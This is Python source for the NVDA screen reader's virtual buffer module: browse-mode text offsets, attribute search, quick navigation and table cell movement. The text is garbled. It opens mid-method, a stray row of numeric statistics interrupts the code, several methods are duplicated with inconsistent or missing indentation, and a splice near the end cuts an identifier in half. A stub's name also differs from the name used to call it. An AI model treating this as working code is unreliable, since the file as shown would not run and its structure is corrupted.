			if field.getPresentationCategory(controlFields,formatConfig)==field.PRESCAT_CONTAINER or field.get("landmark"):
				containerField=field
				break
		if not containerField: return None
		docHandle=int(containerField['controlIdentifier_docHandle'])
		ID=int(containerField['controlIdentifier_ID'])
		offsets = textRange._getOffsetsFromFieldIdentifier(docHandle,ID)
		return self.makeTextInfo(textInfos.offsets.Offsets(*offsets))
	@classmethod
	def changeNotify(cls, rootDocHandle, rootID):
		"""Called when the remote buffer for the given root has changed;
		queues an update on the matching live buffer, if any.
		"""
		try:
			queueHandler.queueFunction(queueHandler.eventQueue, cls.rootIdentifiers[rootDocHandle, rootID]._handleUpdate)
		except KeyError:
			pass
	def _handleUpdate(self):
		"""Handle an update to this buffer.
		"""
		if not self.VBufHandle:
			# #4859: The buffer was unloaded after this method was queued.
			return
		braille.handler.handleUpdate(self)
	def getControlFieldForNVDAObject(self, obj):
		"""Return the control field attributes for the given NVDAObject.
		@raise LookupError: if the object has no field in this buffer.
		"""
		docHandle, objId = self.getIdentifierFromNVDAObject(obj)
		objId = str(objId)
		info = self.makeTextInfo(obj)
		info.collapse()
		info.expand(textInfos.UNIT_CHARACTER)
		for item in info.getTextWithFields():
			if not isinstance(item, textInfos.FieldCommand) or not item.field:
				continue
			fieldId = item.field.get("controlIdentifier_ID")
			if fieldId == objId:
				return item.field
		raise LookupError
	def _isNVDAObjectInApplication_noWalk(self, obj):
		inApp = super(VirtualBuffer, self)._isNVDAObjectInApplication_noWalk(obj)
		if inApp is not None:
			return inApp
		# If the object is in the buffer, it's definitely not in an application.
		try:
			docHandle, objId = self.getIdentifierFromNVDAObject(obj)
		except Exception:
			# Narrowed from a bare except; the object may die mid-walk.
			log.debugWarning("getIdentifierFromNVDAObject failed. "
				"Object probably died while walking ancestors.", exc_info=True)
			return None
		node = VBufRemote_nodeHandle_t()
		if not self.VBufHandle:
			return None
		try:
			NVDAHelper.localLib.VBuf_getControlFieldNodeWithIdentifier(self.VBufHandle, docHandle, objId,ctypes.byref(node))
		except WindowsError:
			return None
		if node:
			return False
		# Unknown: the object simply isn't rendered into this buffer.
		return None
	__gestures = {
		"kb:NVDA+f5": "refreshBuffer",
		"kb:NVDA+v": "toggleScreenLayout",
	}
| 38.906722 | 212 | 0.741776 |
import time
import threading
import ctypes
import collections
import itertools
import weakref
import wx
import review
import NVDAHelper
import XMLFormatting
import scriptHandler
from scriptHandler import isScriptWaiting, willSayAllResume
import speech
import NVDAObjects
import api
import sayAllHandler
import controlTypes
import textInfos.offsets
import config
import cursorManager
import browseMode
import gui
import eventHandler
import braille
import queueHandler
from logHandler import log
import ui
import aria
import nvwave
import treeInterceptorHandler
import watchdog
from abc import abstractmethod
# Search directions for VBuf_findNodeByAttributes; must match the enum in the
# nvdaHelper C++ code.
VBufStorage_findDirection_forward=0
VBufStorage_findDirection_back=1
VBufStorage_findDirection_up=2
# Remote node handles are 64 bit pointers in the target process.
VBufRemote_nodeHandle_t=ctypes.c_ulonglong
class VBufStorage_findMatch_word(str):
	"""Marker string type: match the value as a whole word rather than exactly."""
	pass
# Sentinel search value: the attribute must exist with a non-empty value.
VBufStorage_findMatch_notEmpty = object()
FINDBYATTRIBS_ESCAPE_TABLE = {
	# Symbols that are escaped in the serialized attributes string.
	ord(u":"): r"\\:",
	ord(u";"): r"\\;",
	ord(u"\\"): u"\\\\\\\\",
}
# Symbols that must additionally be escaped for a regular expression.
FINDBYATTRIBS_ESCAPE_TABLE.update({(ord(s), u"\\" + s) for s in u"^$.*+?()[]{}|"})
def _prepareForFindByAttributes(attribs):
	"""Build the (attribute name list, regular expression) arguments for a
	VBuf_findNodeByAttributes call from one mapping, or a sequence of
	alternative mappings, of attribute names to acceptable value lists.
	"""
	# Coerce a value to a string and escape regex/attribute-string specials.
	escape = lambda val: str(val).translate(FINDBYATTRIBS_ESCAPE_TABLE)
	reqAttrs = []
	regexp = []
	if isinstance(attribs, dict):
		# Single option; normalise to a sequence of one.
		attribs = (attribs,)
	# All options will match against the union of requested attribute names.
	for option in attribs:
		for name in option:
			reqAttrs.append(name)
	# Build one alternative sub-pattern per option.
	for option in attribs:
		optRegexp = []
		for name in reqAttrs:
			optRegexp.append("%s:" % escape(name))
			values = option.get(name)
			if not values:
				# No constraint: match any (possibly empty) value.
				optRegexp.append(r"(?:\\;|[^;])*;")
			elif values[0] is VBufStorage_findMatch_notEmpty:
				# There must be a value for this attribute.
				optRegexp.append(r"(?:\\;|[^;])+;")
			elif isinstance(values[0], VBufStorage_findMatch_word):
				# Assume all are word matches.
				optRegexp.append(r"(?:\\;|[^;])*\b(?:")
				optRegexp.append("|".join(escape(val) for val in values))
				optRegexp.append(r")\b(?:\\;|[^;])*;")
			else:
				# Assume all are exact matches or None (must not exist).
				optRegexp.append("(?:" )
				optRegexp.append("|".join((escape(val)+u';') if val is not None else u';' for val in values))
				optRegexp.append(")")
		regexp.append("".join(optRegexp))
	return u" ".join(reqAttrs), u"|".join(regexp)
class VirtualBufferQuickNavItem(browseMode.TextInfoQuickNavItem):
	"""A quick navigation item (heading, link, etc.) backed by a virtual buffer node."""
	def __init__(self,itemType,document,vbufNode,startOffset,endOffset):
		# Build the TextInfo covering the node, then fetch its (docHandle, ID)
		# identifier from the in-process helper.
		textInfo=document.makeTextInfo(textInfos.offsets.Offsets(startOffset,endOffset))
		super(VirtualBufferQuickNavItem,self).__init__(itemType,document,textInfo)
		docHandle=ctypes.c_int()
		ID=ctypes.c_int()
		NVDAHelper.localLib.VBuf_getIdentifierFromControlFieldNode(document.VBufHandle, vbufNode, ctypes.byref(docHandle), ctypes.byref(ID))
		self.vbufFieldIdentifier=(docHandle.value,ID.value)
		self.vbufNode=vbufNode
	@property
	def obj(self):
		# The NVDAObject corresponding to this buffer node.
		return self.document.getNVDAObjectFromIdentifier(*self.vbufFieldIdentifier)
	@property
	def label(self):
		attrs = {}
		def propertyGetter(prop):
			if not attrs:
				# Lazily fetch the attributes the first time they're needed.
				attrs.update(self.textInfo._getControlFieldAttribs(self.vbufFieldIdentifier[0], self.vbufFieldIdentifier[1]))
			return attrs.get(prop)
		return self._getLabelForProperties(propertyGetter)
	def isChild(self,parent):
		# Headings nest by level: numerically larger level = child of smaller.
		if self.itemType == "heading":
			try:
				if (int(self.textInfo._getControlFieldAttribs(self.vbufFieldIdentifier[0], self.vbufFieldIdentifier[1])["level"])
					> int(parent.textInfo._getControlFieldAttribs(parent.vbufFieldIdentifier[0], parent.vbufFieldIdentifier[1])["level"])):
					return True
			except (KeyError, ValueError, TypeError):
				return False
		return super(VirtualBufferQuickNavItem,self).isChild(parent)
class VirtualBufferTextInfo(browseMode.BrowseModeDocumentTextInfo,textInfos.offsets.OffsetsTextInfo):
    """Offset-based TextInfo implementation over a native (remote) virtual buffer."""

    # Offsets past the end of the buffer are invalid rather than being clamped.
    allowMoveToOffsetPastEnd=False

    def _getControlFieldAttribs(self, docHandle, id):
        """Return the control field attributes for the field with the given identifier
        covering this position. Raises LookupError if no such field encloses it."""
        info = self.copy()
        info.expand(textInfos.UNIT_CHARACTER)
        # Walk the field commands innermost-first, looking for the matching controlStart.
        for field in reversed(info.getTextWithFields()):
            if not (isinstance(field, textInfos.FieldCommand) and field.command == "controlStart"):
                continue
            attrs = field.field
            if int(attrs["controlIdentifier_docHandle"]) == docHandle and int(attrs["controlIdentifier_ID"]) == id:
                return attrs
        raise LookupError

    def _getFieldIdentifierFromOffset(self, offset):
        """Return the (docHandle, ID) identifier of the control field node at offset."""
        startOffset = ctypes.c_int()
        endOffset = ctypes.c_int()
        docHandle = ctypes.c_int()
        ID = ctypes.c_int()
        node=VBufRemote_nodeHandle_t()
        NVDAHelper.localLib.VBuf_locateControlFieldNodeAtOffset(self.obj.VBufHandle, offset, ctypes.byref(startOffset), ctypes.byref(endOffset), ctypes.byref(docHandle), ctypes.byref(ID),ctypes.byref(node))
        if not any((docHandle.value, ID.value)):
            raise LookupError("Neither docHandle nor ID found for offset %d" % offset)
        return docHandle.value, ID.value

    def _getOffsetsFromFieldIdentifier(self, docHandle, ID):
        """Return the (start, end) buffer offsets of the control field node with the
        given identifier. Raises LookupError if the node does not exist."""
        node=VBufRemote_nodeHandle_t()
        NVDAHelper.localLib.VBuf_getControlFieldNodeWithIdentifier(self.obj.VBufHandle, docHandle, ID,ctypes.byref(node))
        if not node:
            raise LookupError
        start = ctypes.c_int()
        end = ctypes.c_int()
        NVDAHelper.localLib.VBuf_getFieldNodeOffsets(self.obj.VBufHandle, node, ctypes.byref(start), ctypes.byref(end))
        return start.value, end.value

    def _getBoundingRectFromOffset(self,offset):
        """Return the screen location of the NVDAObject at offset.
        Raises LookupError when no object exists there or it has no usable location."""
        o = self._getNVDAObjectFromOffset(offset)
        if not o:
            raise LookupError("no NVDAObject at offset %d" % offset)
        if o.hasIrrelevantLocation:
            raise LookupError("Object is off screen, invisible or has no location")
        return o.location

    def _getNVDAObjectFromOffset(self,offset):
        """Return the NVDAObject whose control field covers offset, or None."""
        try:
            docHandle,ID=self._getFieldIdentifierFromOffset(offset)
        except LookupError:
            log.debugWarning("Couldn't get NVDAObject from offset %d" % offset)
            return None
        return self.obj.getNVDAObjectFromIdentifier(docHandle,ID)

    def _getOffsetsFromNVDAObjectInBuffer(self,obj):
        """Return the buffer offsets for obj itself (no ancestor fallback)."""
        docHandle,ID=self.obj.getIdentifierFromNVDAObject(obj)
        return self._getOffsetsFromFieldIdentifier(docHandle,ID)
    def _getOffsetsFromNVDAObject(self, obj):
        """Return buffer offsets for obj, falling back to container ancestors for
        descendants (e.g. list items) that are not rendered into the buffer."""
        while True:
            try:
                return self._getOffsetsFromNVDAObjectInBuffer(obj)
            except LookupError:
                pass
            # Interactive list/combo box/tree view descendants aren't rendered into the buffer, even though they are still considered part of it.
            obj = obj.parent
            if not obj or obj.role not in (controlTypes.ROLE_LIST, controlTypes.ROLE_COMBOBOX, controlTypes.ROLE_GROUPING, controlTypes.ROLE_TREEVIEW, controlTypes.ROLE_TREEVIEWITEM):
                break
        raise LookupError

    def __init__(self,obj,position):
        # Keep a reference to the owning tree interceptor before base init uses it.
        self.obj=obj
        super(VirtualBufferTextInfo,self).__init__(obj,position)

    def _getSelectionOffsets(self):
        """Return the (start, end) of the current selection in the buffer."""
        start=ctypes.c_int()
        end=ctypes.c_int()
        NVDAHelper.localLib.VBuf_getSelectionOffsets(self.obj.VBufHandle,ctypes.byref(start),ctypes.byref(end))
        return start.value,end.value

    def _setSelectionOffsets(self,start,end):
        NVDAHelper.localLib.VBuf_setSelectionOffsets(self.obj.VBufHandle,start,end)

    def _getCaretOffset(self):
        # The caret is modelled as the start of the selection.
        return self._getSelectionOffsets()[0]

    def _setCaretOffset(self,offset):
        # Setting the caret collapses the selection to a single offset.
        return self._setSelectionOffsets(offset,offset)

    def _getStoryLength(self):
        return NVDAHelper.localLib.VBuf_getTextLength(self.obj.VBufHandle)

    def _getTextRange(self,start,end):
        """Return plain text (no markup) for the given offset range."""
        if start==end:
            return u""
        return NVDAHelper.VBuf_getTextInRange(self.obj.VBufHandle,start,end,False) or u""
    def _getPlaceholderAttribute(self, attrs, placeholderAttrsKey):
        """Return the field's placeholder text when it should be reported, else None.

        The placeholder is only relevant when the control's rendered content is
        effectively empty (zero length, or a single space character).
        """
        placeholder = attrs.get(placeholderAttrsKey)
        if not placeholder:
            return None
        try:
            start, end = self._getOffsetsFromFieldIdentifier(
                int(attrs.get('controlIdentifier_docHandle')),
                int(attrs.get('controlIdentifier_ID')))
        except (LookupError, ValueError):
            # Can't inspect the content; err on the side of reporting the placeholder.
            log.debugWarning("unable to get offsets used to fetch content")
            return placeholder
        else:
            valueLen = end - start
            if not valueLen:
                # Control renders no content at all.
                return placeholder
            if valueLen < 2:
                # One character: treat a lone space (or empty text) as "no content".
                controlFieldText = self.obj.makeTextInfo(textInfos.offsets.Offsets(start, end)).text
                if not controlFieldText or controlFieldText == ' ':
                    return placeholder
        return None
def _getFieldsInRange(self,start,end):
text=NVDAHelper.VBuf_getTextInRange(self.obj.VBufHandle,start,end,True)
if not text:
return ""
commandList=XMLFormatting.XMLTextParser().parse(text)
for index in range(len(commandList)):
if isinstance(commandList[index],textInfos.FieldCommand):
field=commandList[index].field
if isinstance(field,textInfos.ControlField):
commandList[index].field=self._normalizeControlField(field)
elif isinstance(field,textInfos.FormatField):
commandList[index].field=self._normalizeFormatField(field)
return commandList
def getTextWithFields(self,formatConfig=None):
start=self._startOffset
end=self._endOffset
if start==end:
return ""
return self._getFieldsInRange(start,end)
    def _getWordOffsets(self,offset):
        """Return word offsets at offset, clamped to the containing buffer line."""
        lineStart=ctypes.c_int()
        lineEnd=ctypes.c_int()
        NVDAHelper.localLib.VBuf_getLineOffsets(self.obj.VBufHandle,offset,0,False,ctypes.byref(lineStart),ctypes.byref(lineEnd))
        word_startOffset,word_endOffset=super(VirtualBufferTextInfo,self)._getWordOffsets(offset)
        # Never let a word span a line boundary.
        return (max(lineStart.value,word_startOffset),min(lineEnd.value,word_endOffset))

    def _getLineOffsets(self,offset):
        """Return line offsets at offset, honouring the user's max line length
        and screen-layout settings."""
        lineStart=ctypes.c_int()
        lineEnd=ctypes.c_int()
        NVDAHelper.localLib.VBuf_getLineOffsets(self.obj.VBufHandle,offset,config.conf["virtualBuffers"]["maxLineLength"],config.conf["virtualBuffers"]["useScreenLayout"],ctypes.byref(lineStart),ctypes.byref(lineEnd))
        return lineStart.value,lineEnd.value

    def _getParagraphOffsets(self,offset):
        """Return paragraph offsets at offset.
        NOTE(review): this reuses VBuf_getLineOffsets with maxLineLength=0 and the
        boolean flag True — presumably the flag requests whole-paragraph lines;
        confirm against the nvdaHelper C++ signature before changing.
        """
        lineStart=ctypes.c_int()
        lineEnd=ctypes.c_int()
        NVDAHelper.localLib.VBuf_getLineOffsets(self.obj.VBufHandle,offset,0,True,ctypes.byref(lineStart),ctypes.byref(lineEnd))
        return lineStart.value,lineEnd.value
    def _normalizeControlField(self,attrs):
        """Convert raw string control field attributes (as parsed from the buffer's
        XML) into typed values, and resolve table header cell references to text."""
        tableLayout=attrs.get('table-layout')
        if tableLayout:
            # "1"/"0" string flag -> bool.
            attrs['table-layout']=tableLayout=="1"
        # Numeric table attributes arrive as strings.
        for attr in ("table-id","table-rownumber","table-columnnumber","table-rowsspanned","table-columnsspanned"):
            attrVal=attrs.get(attr)
            if attrVal is not None:
                attrs[attr]=int(attrVal)
        isHidden=attrs.get('isHidden')
        if isHidden:
            attrs['isHidden']=isHidden=="1"
        # Resolve row/column header cell identifiers ("docHandle,ID;...") to their text.
        for axis in "row", "column":
            attr = attrs.pop("table-%sheadercells" % axis, None)
            if not attr:
                continue
            cellIdentifiers = [identifier.split(",") for identifier in attr.split(";") if identifier]
            textList = []
            for docHandle, ID in cellIdentifiers:
                try:
                    start, end = self._getOffsetsFromFieldIdentifier(int(docHandle), int(ID))
                except (LookupError, ValueError):
                    # Header cell no longer exists or identifier is malformed; skip it.
                    continue
                textList.append(self.obj.makeTextInfo(textInfos.offsets.Offsets(start, end)).text)
            attrs["table-%sheadertext" % axis] = "\n".join(textList)
        if attrs.get("role") in (controlTypes.ROLE_LANDMARK, controlTypes.ROLE_REGION):
            # Landmarks/regions should always have their name reported.
            attrs['alwaysReportName'] = True
        docHandle=attrs.get('controlIdentifier_docHandle')
        ID=attrs.get('controlIdentifier_ID')
        if docHandle is not None and ID is not None:
            attrs['uniqueID']=(docHandle,ID)
        return attrs

    def _normalizeFormatField(self, attrs):
        """Convert raw string format field attributes into typed values."""
        strippedCharsFromStart = attrs.get("strippedCharsFromStart")
        if strippedCharsFromStart is not None:
            assert strippedCharsFromStart.isdigit(), "strippedCharsFromStart isn't a digit, %r" % strippedCharsFromStart
            attrs["strippedCharsFromStart"] = int(strippedCharsFromStart)
        return attrs

    def _getLineNumFromOffset(self, offset):
        # Line numbers are not supported for virtual buffers.
        return None
    def _get_fieldIdentifierAtStart(self):
        # (docHandle, ID) of the control field at the start of this range.
        return self._getFieldIdentifierFromOffset( self._startOffset)

    def _getUnitOffsets(self, unit, offset):
        """Handle the virtual-buffer-specific control-field and format-field units;
        delegate everything else to the base offsets implementation."""
        if unit == textInfos.UNIT_CONTROLFIELD:
            startOffset=ctypes.c_int()
            endOffset=ctypes.c_int()
            docHandle=ctypes.c_int()
            ID=ctypes.c_int()
            node=VBufRemote_nodeHandle_t()
            NVDAHelper.localLib.VBuf_locateControlFieldNodeAtOffset(self.obj.VBufHandle,offset,ctypes.byref(startOffset),ctypes.byref(endOffset),ctypes.byref(docHandle),ctypes.byref(ID),ctypes.byref(node))
            return startOffset.value,endOffset.value
        elif unit == textInfos.UNIT_FORMATFIELD:
            startOffset=ctypes.c_int()
            endOffset=ctypes.c_int()
            node=VBufRemote_nodeHandle_t()
            NVDAHelper.localLib.VBuf_locateTextFieldNodeAtOffset(self.obj.VBufHandle,offset,ctypes.byref(startOffset),ctypes.byref(endOffset),ctypes.byref(node))
            return startOffset.value,endOffset.value
        return super(VirtualBufferTextInfo, self)._getUnitOffsets(unit, offset)

    def _get_clipboardText(self):
        # Therefore, get the text in block (paragraph) chunks and join the chunks with \r\n.
        blocks = (block.strip("\r\n") for block in self.getTextInChunks(textInfos.UNIT_PARAGRAPH))
        return "\r\n".join(blocks)

    def activate(self):
        # Activate (e.g. click) whatever is at this position.
        self.obj._activatePosition(info=self)

    def getMathMl(self, field):
        """Return the MathML markup for the math object described by field."""
        docHandle = int(field["controlIdentifier_docHandle"])
        nodeId = int(field["controlIdentifier_ID"])
        obj = self.obj.getNVDAObjectFromIdentifier(docHandle, nodeId)
        return obj.mathMl
class VirtualBuffer(browseMode.BrowseModeDocumentTreeInterceptor):
    """Browse-mode document tree interceptor backed by an in-process virtual buffer."""

    TextInfo=VirtualBufferTextInfo

    #: Maps root identifiers (docHandle and ID) to buffers.
    rootIdentifiers = weakref.WeakValueDictionary()

    def __init__(self,rootNVDAObject,backendName=None):
        super(VirtualBuffer,self).__init__(rootNVDAObject)
        self.backendName=backendName
        # Handle to the remote buffer; None until loadBuffer succeeds.
        self.VBufHandle=None
        self.isLoading=False
        self.rootDocHandle,self.rootID=self.getIdentifierFromNVDAObject(self.rootNVDAObject)
        # Register so changeNotify can route update notifications to this buffer.
        self.rootIdentifiers[self.rootDocHandle, self.rootID] = self

    def prepare(self):
        if not self.rootNVDAObject.appModule.helperLocalBindingHandle:
            # #5758: If NVDA starts with a document already in focus, there will have been no focus event to inject nvdaHelper yet.
            # So at very least don't try to prepare a virtualBuffer as it will fail.
            log.debugWarning("appModule has no binding handle to injected code, can't prepare virtualBuffer yet.")
            return
        self.shouldPrepare=False
        self.loadBuffer()

    def _get_shouldPrepare(self):
        # Prepare only when not already loading and no buffer exists yet.
        return not self.isLoading and not self.VBufHandle

    def terminate(self):
        super(VirtualBuffer,self).terminate()
        if not self.VBufHandle:
            return
        self.unloadBuffer()

    def _get_isReady(self):
        return bool(self.VBufHandle and not self.isLoading)
def loadBuffer(self):
self.isLoading = True
self._loadProgressCallLater = wx.CallLater(1000, self._loadProgress)
threading.Thread(
name=f"{self.__class__.__module__}.{self.loadBuffer.__qualname__}",
target=self._loadBuffer).start(
)
def _loadBuffer(self):
try:
if log.isEnabledFor(log.DEBUG):
startTime = time.time()
self.VBufHandle=NVDAHelper.localLib.VBuf_createBuffer(
self.rootNVDAObject.appModule.helperLocalBindingHandle,
self.rootDocHandle,self.rootID,
self.backendName
)
if not self.VBufHandle:
raise RuntimeError("Could not remotely create virtualBuffer")
except:
log.error("", exc_info=True)
queueHandler.queueFunction(queueHandler.eventQueue, self._loadBufferDone, success=False)
return
if log.isEnabledFor(log.DEBUG):
log.debug("Buffer load took %.3f sec, %d chars" % (
time.time() - startTime,
NVDAHelper.localLib.VBuf_getTextLength(self.VBufHandle)))
queueHandler.queueFunction(queueHandler.eventQueue, self._loadBufferDone)
    def _loadBufferDone(self, success=True):
        """Finish loading on the main thread: stop the progress timer, clear the
        loading flag and announce/refresh as appropriate."""
        self._loadProgressCallLater.Stop()
        del self._loadProgressCallLater
        self.isLoading = False
        if not success:
            # Loading failed: fall back to pass-through (focus) mode.
            self.passThrough=True
            return
        if self._hadFirstGainFocus:
            # If this buffer has already had focus once while loaded, this is a refresh.
            # Translators: Reported when a page reloads (example: after refreshing a webpage).
            ui.message(_("Refreshed"))
        if api.getFocusObject().treeInterceptor == self:
            self.event_treeInterceptor_gainFocus()

    def _loadProgress(self):
        # Translators: Reported while loading a document.
        ui.message(_("Loading document..."))

    def unloadBuffer(self):
        """Destroy the remote buffer, tolerating a hung or dead remote process."""
        if self.VBufHandle is not None:
            try:
                # cancellableExecute guards against the remote process hanging.
                watchdog.cancellableExecute(NVDAHelper.localLib.VBuf_destroyBuffer, ctypes.byref(ctypes.c_int(self.VBufHandle)))
            except WindowsError:
                # Remote process already gone; nothing to clean up remotely.
                pass
            self.VBufHandle=None
    def isNVDAObjectPartOfLayoutTable(self,obj):
        """Return whether obj sits inside a table marked as a layout table.

        Returns the effective table-layout flag: True/False when present on the
        object's own field or its containing table's field. NOTE(review): may
        also return None when no table-layout attribute exists on the table
        field — callers appear to treat that as falsy; confirm.
        """
        docHandle,ID=self.getIdentifierFromNVDAObject(obj)
        ID=str(ID)
        info=self.makeTextInfo(obj)
        info.collapse()
        info.expand(textInfos.UNIT_CHARACTER)
        fieldCommands=[x for x in info.getTextWithFields() if isinstance(x,textInfos.FieldCommand)]
        tableLayout=None
        tableID=None
        # First check the object's own field for an explicit table-layout;
        # otherwise remember its table-id for a second pass.
        for fieldCommand in fieldCommands:
            fieldID=fieldCommand.field.get("controlIdentifier_ID") if fieldCommand.field else None
            if fieldID==ID:
                tableLayout=fieldCommand.field.get('table-layout')
                if tableLayout is not None:
                    return tableLayout
                tableID=fieldCommand.field.get('table-id')
                break
        if tableID is None:
            # Object isn't inside a table at all.
            return False
        # Second pass: look up the table's own field for its layout flag.
        for fieldCommand in fieldCommands:
            fieldID=fieldCommand.field.get("controlIdentifier_ID") if fieldCommand.field else None
            if fieldID==tableID:
                tableLayout=fieldCommand.field.get('table-layout',False)
                break
        return tableLayout
    @abstractmethod
    def getNVDAObjectFromIdentifier(self, docHandle, ID):
        """Return the NVDAObject for a (docHandle, ID) identifier.
        Subclasses must implement this.
        """
        raise NotImplementedError

    @abstractmethod
    def getIdentifierFromNVDAObject(self,obj):
        """Return the (docHandle, ID) identifier for an NVDAObject.
        Subclasses must implement this.
        """
        raise NotImplementedError

    def script_refreshBuffer(self,gesture):
        if scriptHandler.isScriptWaiting():
            # This script may cause subsequently queued scripts to fail, so don't execute.
            return
        self.unloadBuffer()
        self.loadBuffer()
    # Translators: input help message for the refresh buffer script.
    script_refreshBuffer.__doc__ = _("Refreshes the document content")

    def script_toggleScreenLayout(self,gesture):
        # Flip the persistent screen-layout setting and announce the new state.
        config.conf["virtualBuffers"]["useScreenLayout"]=not config.conf["virtualBuffers"]["useScreenLayout"]
        if config.conf["virtualBuffers"]["useScreenLayout"]:
            ui.message(_("Use screen layout on"))
        else:
            ui.message(_("Use screen layout off"))
    script_toggleScreenLayout.__doc__ = _("Toggles on and off if the screen layout is preserved while rendering the document content")
def _searchableAttributesForNodeType(self,nodeType):
pass
def _iterNodesByType(self,nodeType,direction="next",pos=None):
attribs=self._searchableAttribsForNodeType(nodeType)
if not attribs:
raise NotImplementedError
return self._iterNodesByAttribs(attribs, direction, pos,nodeType)
    def _iterNodesByAttribs(self, attribs, direction="next", pos=None,nodeType=None):
        """Yield VirtualBufferQuickNavItems for buffer nodes matching attribs,
        searching from pos (or the buffer start) in the given direction."""
        offset=pos._startOffset if pos else -1
        reqAttrs, regexp = _prepareForFindByAttributes(attribs)
        startOffset=ctypes.c_int()
        endOffset=ctypes.c_int()
        # Map the direction keyword to the native search-direction constant.
        if direction=="next":
            direction=VBufStorage_findDirection_forward
        elif direction=="previous":
            direction=VBufStorage_findDirection_back
        elif direction=="up":
            direction=VBufStorage_findDirection_up
        else:
            raise ValueError("unknown direction: %s"%direction)
        while True:
            try:
                node=VBufRemote_nodeHandle_t()
                NVDAHelper.localLib.VBuf_findNodeByAttributes(self.VBufHandle,offset,direction,reqAttrs,regexp,ctypes.byref(startOffset),ctypes.byref(endOffset),ctypes.byref(node))
            except:
                # Best effort: any failure of the remote call ends the iteration.
                return
            if not node:
                return
            yield VirtualBufferQuickNavItem(nodeType,self,node,startOffset.value,endOffset.value)
            # Continue the search from the last match.
            # NOTE(review): this rebinds offset to the ctypes c_int object itself;
            # ctypes converts it when passed as an argument, but ``startOffset.value``
            # would be clearer — confirm before changing.
            offset=startOffset
    def _getTableCellAt(self,tableID,startPos,row,column):
        """Return a TextInfo for the cell at exactly (row, column) in the table.
        Raises LookupError when no such cell exists."""
        try:
            return next(self._iterTableCells(tableID,row=row,column=column))
        except StopIteration:
            raise LookupError

    def _iterTableCells(self, tableID, startPos=None, direction="next", row=None, column=None):
        """Yield TextInfos for cells of the given table, optionally restricted to
        a specific row and/or column."""
        attrs = {"table-id": [str(tableID)]}
        if row is not None:
            attrs["table-rownumber"] = [str(row)]
        if column is not None:
            attrs["table-columnnumber"] = [str(column)]
        results = self._iterNodesByAttribs(attrs, pos=startPos, direction=direction)
        if not startPos and not row and not column and direction == "next":
            # Skip the first match, which is presumably the table node itself
            # (it also carries the table-id attribute) — TODO confirm.
            next(results)
        for item in results:
            yield item.textInfo
    def _getNearestTableCell(self, tableID, startPos, origRow, origCol, origRowSpan, origColSpan, movement, axis):
        """Return the TextInfo of the nearest cell when moving from the cell at
        (origRow, origCol) along axis ("row"/"column") in movement direction
        ("next"/"previous"). Raises LookupError if there is no such cell."""
        # Determine destination row and column, accounting for the origin's span.
        destRow = origRow
        destCol = origCol
        if axis == "row":
            destRow += origRowSpan if movement == "next" else -1
        elif axis == "column":
            destCol += origColSpan if movement == "next" else -1
        if destCol < 1:
            # Optimisation: We're definitely at the edge of the column.
            raise LookupError
        # Optimisation: Try searching for exact destination coordinates.
        # This won't work if they are covered by a cell spanning multiple rows/cols, but this won't be true in the majority of cases.
        try:
            return self._getTableCellAt(tableID,startPos,destRow,destCol)
        except LookupError:
            pass
        # Cells are grouped by row, so in most cases, we simply need to search in the right direction.
        for info in self._iterTableCells(tableID, direction=movement, startPos=startPos):
            _ignore, row, col, rowSpan, colSpan = self._getTableCellCoords(info)
            if row <= destRow < row + rowSpan and col <= destCol < col + colSpan:
                return info
            elif row > destRow and movement == "next":
                # Optimisation: We've gone forward past destRow, so we know we won't find the cell.
                # We can't reverse this logic when moving backwards because there might be a prior cell on an earlier row which spans multiple rows.
                break
        if axis == "row" or (axis == "column" and movement == "previous"):
            # In most cases, there's nothing more to try.
            raise LookupError
        else:
            # We're moving forward by column.
            # In this case, there might be a cell on an earlier row which spans multiple rows.
            # Therefore, try searching backwards.
            for info in self._iterTableCells(tableID, direction="previous", startPos=startPos):
                _ignore, row, col, rowSpan, colSpan = self._getTableCellCoords(info)
                if row <= destRow < row + rowSpan and col <= destCol < col + colSpan:
                    return info
            else:
                raise LookupError
    def _isSuitableNotLinkBlock(self, textRange):
        # A block of text only counts as a "not link block" if it is long enough.
        return (textRange._endOffset - textRange._startOffset) >= self.NOT_LINK_BLOCK_MIN_LEN

    def getEnclosingContainerRange(self, textRange):
        """Return a TextInfo spanning the innermost container (list, table,
        blockquote, frame, landmark, ...) enclosing textRange, or None."""
        formatConfig=config.conf['documentFormatting'].copy()
        # Force container reporting on so presentation categories are computed.
        formatConfig.update({"reportBlockQuotes":True,"reportTables":True,"reportLists":True,"reportFrames":True})
        controlFields=[]
        # Collect the stack of controlStart fields covering the range's start.
        for cmd in textRange.getTextWithFields():
            if not isinstance(cmd,textInfos.FieldCommand) or cmd.command!="controlStart":
                break
            controlFields.append(cmd.field)
        containerField=None
        # Walk outward (innermost first) until a container or landmark is found.
        while controlFields:
            field=controlFields.pop()
            if field.getPresentationCategory(controlFields,formatConfig)==field.PRESCAT_CONTAINER or field.get("landmark"):
                containerField=field
                break
        if not containerField: return None
        docHandle=int(containerField['controlIdentifier_docHandle'])
        ID=int(containerField['controlIdentifier_ID'])
        offsets = textRange._getOffsetsFromFieldIdentifier(docHandle,ID)
        return self.makeTextInfo(textInfos.offsets.Offsets(*offsets))

    @classmethod
    def changeNotify(cls, rootDocHandle, rootID):
        """Route a remote change notification to the owning buffer (if any) by
        queuing its _handleUpdate onto the main event queue."""
        try:
            queueHandler.queueFunction(queueHandler.eventQueue, cls.rootIdentifiers[rootDocHandle, rootID]._handleUpdate)
        except KeyError:
            # No buffer registered for this root; notification is stale.
            pass
def _handleUpdate(self):
if not self.VBufHandle:
ontrolFieldForNVDAObject(self, obj):
docHandle, objId = self.getIdentifierFromNVDAObject(obj)
objId = str(objId)
info = self.makeTextInfo(obj)
info.collapse()
info.expand(textInfos.UNIT_CHARACTER)
for item in info.getTextWithFields():
if not isinstance(item, textInfos.FieldCommand) or not item.field:
continue
fieldId = item.field.get("controlIdentifier_ID")
if fieldId == objId:
return item.field
raise LookupError
    def _isNVDAObjectInApplication_noWalk(self, obj):
        """Cheaply determine whether obj lives inside an embedded application.
        Returns True/False when determinable, or None when a walk is required."""
        inApp = super(VirtualBuffer, self)._isNVDAObjectInApplication_noWalk(obj)
        if inApp is not None:
            return inApp
        # If the object is in the buffer, it's definitely not in an application.
        try:
            docHandle, objId = self.getIdentifierFromNVDAObject(obj)
        except:
            log.debugWarning("getIdentifierFromNVDAObject failed. "
                "Object probably died while walking ancestors.", exc_info=True)
            return None
        node = VBufRemote_nodeHandle_t()
        if not self.VBufHandle:
            return None
        try:
            NVDAHelper.localLib.VBuf_getControlFieldNodeWithIdentifier(self.VBufHandle, docHandle, objId,ctypes.byref(node))
        except WindowsError:
